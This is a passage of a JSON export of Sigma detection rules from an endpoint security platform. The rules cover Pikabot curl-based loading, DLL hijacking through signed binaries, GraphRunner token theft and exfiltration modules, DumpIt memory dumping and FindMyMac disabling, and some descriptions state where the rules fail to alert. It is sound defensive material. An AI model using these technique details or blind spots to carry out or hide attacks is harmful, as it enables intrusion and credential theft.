"rule_creation_date": "2024-12-17",
"rule_modified_date": "2025-06-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "587dc4a6-6be3-43fa-bab1-2589039af85e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616771Z",
"creation_date": "2026-03-23T11:45:34.616775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616782Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_findmymac_disbaled.yml",
"content": "title: FindMyMac Disabled via plutil\nid: 587dc4a6-6be3-43fa-bab1-2589039af85e\ndescription: |\n Detects the FindMyMac feature being disabled via the plutil command, i.e. plutil rewriting the FMMEnabled key of com.apple.findmymac.plist to false.\n Attackers may disable FindMyMac to prevent a stolen or compromised device from being located or wiped remotely.\n Only the plutil command line is matched; the feature being turned off through System Settings or by other tooling is not covered by this rule.\n It is recommended to review the parent process and user of the plutil invocation to identify the process or actor that disabled the feature.\nreferences:\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/07/03\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1562.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Plutil\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n Image: '/usr/bin/plutil'\n CommandLine|contains|all:\n - '-replace FMMEnabled'\n - 'com.apple.findmymac.plist'\n\n selection_disable:\n CommandLine|contains:\n - '-bool NO'\n - 'false'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "587dc4a6-6be3-43fa-bab1-2589039af85e",
"rule_name": "FindMyMac Disabled via plutil",
"rule_description": "Detects the FindMyMac feature being disabled via the plutil command, i.e. plutil rewriting the FMMEnabled key of com.apple.findmymac.plist to false.\nAttackers may disable FindMyMac to prevent a stolen or compromised device from being located or wiped remotely.\nOnly the plutil command line is matched; the feature being turned off through System Settings or by other tooling is not covered by this rule.\nIt is recommended to review the parent process and user of the plutil invocation to identify the process or actor that disabled the feature.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5925b010-3ee3-4193-9359-11e728211c13",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084323Z",
"creation_date": "2026-03-23T11:45:34.084326Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084330Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot",
"https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot",
"https://attack.mitre.org/techniques/T1566/001/"
],
"name": "t1566_001_pikabot.yml",
"content": "title: Pikabot Malware Detected\nid: 5925b010-3ee3-4193-9359-11e728211c13\ndescription: |\n Detects the initial loading stage of the Pikabot malware: a cmd.exe command line that combines echo, curl, ping and exit, or curl.exe launched from such a command line to write a payload under AppData\\Local\\Temp.\n Pikabot is, as of 2023, an emerging malware family that comprises a downloader/installer, a loader, and a core backdoor component. It demonstrates advanced techniques in evasion, injection, and anti-analysis.\n The matched download-and-delay pattern is not unique to Pikabot and may be shared by other loaders or hand-written scripts, so the downloaded file should be examined before attributing the activity to this family.\n It is recommended to analyze the files related to this execution (including the curl target and what is written under Temp) as well as to look for signs of persistence and interactive attacker activity.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot\n - https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot\n - https://attack.mitre.org/techniques/T1566/001/\ndate: 2023/11/20\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566.001\n - attack.defense_evasion\n - attack.t1497\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Pikabot\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_cmd:\n OriginalFileName: 'cmd.exe'\n CommandLine|contains|all:\n - 'echo'\n - 'curl'\n - 'ping'\n - 'exit'\n\n selection_curl:\n OriginalFileName: 'curl.exe'\n CommandLine|contains: 'AppData\\Local\\Temp\\'\n ParentImage|endswith: '\\cmd.exe'\n ParentCommandLine|contains|all:\n - 'echo'\n - 'curl'\n - 'ping'\n - 'exit'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5925b010-3ee3-4193-9359-11e728211c13",
"rule_name": "Pikabot Malware Detected",
"rule_description": "Detects the initial loading stage of the Pikabot malware: a cmd.exe command line that combines echo, curl, ping and exit, or curl.exe launched from such a command line to write a payload under AppData\\Local\\Temp.\nPikabot is, as of 2023, an emerging malware family that comprises a downloader/installer, a loader, and a core backdoor component. It demonstrates advanced techniques in evasion, injection, and anti-analysis.\nThe matched download-and-delay pattern is not unique to Pikabot and may be shared by other loaders or hand-written scripts, so the downloaded file should be examined before attributing the activity to this family.\nIt is recommended to analyze the files related to this execution (including the curl target and what is written under Temp) as well as to look for signs of persistence and interactive attacker activity.\n",
"rule_creation_date": "2023-11-20",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1497",
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "593ebf84-35d4-42cd-98e9-55d9df5f87a6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598591Z",
"creation_date": "2026-03-23T11:45:34.598594Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598601Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ijplmui.yml",
"content": "title: DLL Hijacking via ijplmui.exe\nid: 593ebf84-35d4-42cd-98e9-55d9df5f87a6\ndescription: |\n Detects potential Windows DLL hijacking via ijplmui.exe, a Canon utility, loading IJPLMCOM.dll from an unexpected location.\n DLL hijacking takes advantage of the default Windows search order by placing a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying the legitimate executable to a directory under their control and planting the malicious DLL in the same folder.\n Loads where either the executable or the DLL is located under Program Files\\Canon or Program Files (x86)\\Canon, and DLLs signed by Canon Inc., are filtered out; the path filters are not signature-checked, so a DLL dropped into the Canon installation directory (which requires local administrator rights) would not alert.\n It is recommended to investigate the loaded library (its path, hash and signature) for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ijplmui.exe'\n ImageLoaded|endswith: '\\IJPLMCOM.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Canon'\n - '?:\\Program Files (x86)\\Canon'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Canon'\n - '?:\\Program Files (x86)\\Canon'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Canon Inc.'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "593ebf84-35d4-42cd-98e9-55d9df5f87a6",
"rule_name": "DLL Hijacking via ijplmui.exe",
"rule_description": "Detects potential Windows DLL hijacking via ijplmui.exe, a Canon utility, loading IJPLMCOM.dll from an unexpected location.\nDLL hijacking takes advantage of the default Windows search order by placing a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying the legitimate executable to a directory under their control and planting the malicious DLL in the same folder.\nLoads where either the executable or the DLL is located under Program Files\\Canon or Program Files (x86)\\Canon, and DLLs signed by Canon Inc., are filtered out; the path filters are not signature-checked, so a DLL dropped into the Canon installation directory (which requires local administrator rights) would not alert.\nIt is recommended to investigate the loaded library (its path, hash and signature) for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "593f465e-011d-4370-bd09-936ea5472337",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098853Z",
"creation_date": "2026-03-23T11:45:34.098855Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098859Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fxscover.yml",
"content": "title: DLL Hijacking via fxscover.exe\nid: 593f465e-011d-4370-bd09-936ea5472337\ndescription: |\n Detects potential Windows DLL hijacking via fxscover.exe, a Microsoft-signed Windows binary, loading IPHLPAPI.DLL, netprofm.dll, npmproxy.dll or propsys.dll from outside the Windows system directories.\n DLL hijacking takes advantage of the default Windows search order by placing a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n Loads where either the executable or the DLL is located under System32, SysWOW64 or WinSxS, and DLLs signed by Microsoft Windows, are filtered out; the path filters are not signature-checked, so a DLL written into those directories (which normally requires administrative rights) would not alert.\n It is recommended to investigate the loaded library (its path, hash and signature) for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fxscover.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\propsys.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "593f465e-011d-4370-bd09-936ea5472337",
"rule_name": "DLL Hijacking via fxscover.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fxscover.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library (its path, signature and content) and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59479067-dae2-49e6-828c-e6ed9a6e2a99",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097439Z",
"creation_date": "2026-03-23T11:45:34.097442Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097446Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_usoclient.yml",
"content": "title: DLL Hijacking via UsoClient.exe\nid: 59479067-dae2-49e6-828c-e6ed9a6e2a99\ndescription: |\n Detects potential Windows DLL Hijacking via UsoClient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library (its path, signature and content) and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'UsoClient'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\updatepolicy.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59479067-dae2-49e6-828c-e6ed9a6e2a99",
"rule_name": "DLL Hijacking via UsoClient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via UsoClient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library (its path, signature and content) and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59a0b168-6b3b-4b4c-8d06-7b2a204a55b8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606522Z",
"creation_date": "2026-03-23T11:45:34.606525Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606533Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/dafthack/GraphRunner",
"https://www.blackhillsinfosec.com/introducing-graphrunner/",
"https://www.invictus-ir.com/news/a-defenders-guide-to-graphrunner-part-i",
"https://www.invictus-ir.com/news/a-defenders-guide-to-graphrunner-part-ii"
],
"name": "t1087_graphrunner_usage.yml",
"content": "title: GraphRunner Post-Exploitation Toolset Executed\nid: 59a0b168-6b3b-4b4c-8d06-7b2a204a55b8\ndescription: |\n Detects the execution of GraphRunner, a post-exploitation toolset mostly written in PowerShell, designed to exploit Microsoft Entra ID (Azure AD) environments through Microsoft Graph API.\n The tool enables attackers to perform comprehensive tenant reconnaissance, establish persistence through malicious OAuth apps and security group manipulation, exfiltrate sensitive data from SharePoint, OneDrive, Teams, and Exchange Online.\n It is recommended to investigate the execution context, monitor for suspicious OAuth app registrations, review security group modifications, and analyze data access patterns for signs of exfiltration.\nreferences:\n - https://github.com/dafthack/GraphRunner\n - https://www.blackhillsinfosec.com/introducing-graphrunner/\n - https://www.invictus-ir.com/news/a-defenders-guide-to-graphrunner-part-i\n - https://www.invictus-ir.com/news/a-defenders-guide-to-graphrunner-part-ii\ndate: 2025/01/09\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1528\n - attack.collection\n - attack.t1114\n - attack.t1213\n - attack.persistence\n - attack.t1098.003\n - attack.discovery\n - attack.t1087.001\n - attack.t1087.004\n - attack.t1069.003\n - attack.exfiltration\n - attack.t1530\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.GraphRunner\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n - PowershellScriptPath|endswith: 
'\\GraphRunner.ps1'\n - PowershellCommand|contains|all:\n # Authentication Modules\n - 'Get-GraphTokens'\n - 'Invoke-RefreshGraphTokens '\n - 'Get-AzureAppTokens'\n - 'Invoke-RefreshAzureAppTokens'\n # Recon & Enumeration Modules\n - 'Invoke-GraphRecon'\n - 'Invoke-DumpCAPS'\n - 'Get-AzureADUsers '\n # Persistence Modules\n - 'Invoke-InjectOAuthApp'\n - 'Invoke-SecurityGroupCloner'\n - 'Invoke-AddGroupMember'\n # Pillage Modules\n - 'Invoke-SearchSharePointAndOneDrive'\n - 'Invoke-ImmersiveFileReader'\n - 'Invoke-SearchUserAttributes'\n # Invoke-GraphRunner Module\n - 'Invoke-GraphRunner'\n # Supplemental Modules\n - 'Invoke-AutoOAuthFlow'\n - 'Invoke-DeleteOAuthApp'\n - 'Invoke-DriveFileDownload'\n - 'Invoke-CheckAccess'\n - 'Invoke-ImportTokens'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59a0b168-6b3b-4b4c-8d06-7b2a204a55b8",
"rule_name": "GraphRunner Post-Exploitation Toolset Executed",
"rule_description": "Detects the execution of GraphRunner, a post-exploitation toolset mostly written in PowerShell, designed to exploit Microsoft Entra ID (Azure AD) environments through the Microsoft Graph API.\nThe tool enables attackers to perform comprehensive tenant reconnaissance, establish persistence through malicious OAuth apps and security group manipulation, and exfiltrate sensitive data from SharePoint, OneDrive, Teams, and Exchange Online.\nIt is recommended to investigate the execution context on the host, then review the Entra ID tenant for suspicious OAuth app registrations and consents, security group modifications, and data access patterns for signs of exfiltration, and to consider revoking the sessions and refresh tokens of the accounts whose tokens the tool obtained.\n",
"rule_creation_date": "2025-01-09",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery",
"attack.exfiltration",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1069.003",
"attack.t1087.001",
"attack.t1087.004",
"attack.t1098.003",
"attack.t1114",
"attack.t1213",
"attack.t1528",
"attack.t1530"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59a2da9a-8334-4169-8886-427fec2a7c46",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069916Z",
"creation_date": "2026-03-23T11:45:34.069918Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069922Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_dumpit_executed.yml",
"content": "title: DumpIt Executed\nid: 59a2da9a-8334-4169-8886-427fec2a7c46\ndescription: |\n Detects the execution of a DumpIt binary, a tool used to create full memory dumps for forensic or diagnostic purposes on Windows systems.\n Attackers can use it to dump memory and then extract authentication secrets (such as those held by LSASS) from the dump, which can in turn be used for lateral movement within a network.\n It is recommended to analyze the execution chain associated with this alert, including the user and parent process, and to locate any dump file that was written, to determine its legitimacy.\nreferences:\n - https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary\n - https://attack.mitre.org/techniques/T1003/\ndate: 2025/11/21\nmodified: 2025/11/25\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.DumpIt\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'DumpIt.exe'\n Name|contains: 'dumpit'\n\n exclusion_dfir_orc:\n - Image|endswith: '\\dumpit_x64.exe'\n CommandLine|contains: '\\Temp\\WorkingTemp\\'\n - ParentImage|endswith: '\\DFIR-Orc_x64.exe'\n CommandLine|contains: '\\Temp\\WorkingTemp\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59a2da9a-8334-4169-8886-427fec2a7c46",
"rule_name": "DumpIt Executed",
"rule_description": "Detects the execution of a DumpIt binary, a tool used to create full memory dumps for forensic or diagnostic purposes on Windows systems.\nAttackers can use it to dump memory and then extract authentication secrets (such as those held by LSASS) from the dump, which can in turn be used for lateral movement within a network.\nIt is recommended to analyze the execution chain associated with this alert, including the user and parent process, and to locate any dump file that was written, to determine its legitimacy.\n",
"rule_creation_date": "2025-11-21",
"rule_modified_date": "2025-11-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59bfb123-6127-40af-9574-1ce62826ec93",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078475Z",
"creation_date": "2026-03-23T11:45:34.078477Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078481Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.praetorian.com/blog/how-to-detect-dfscoerce/",
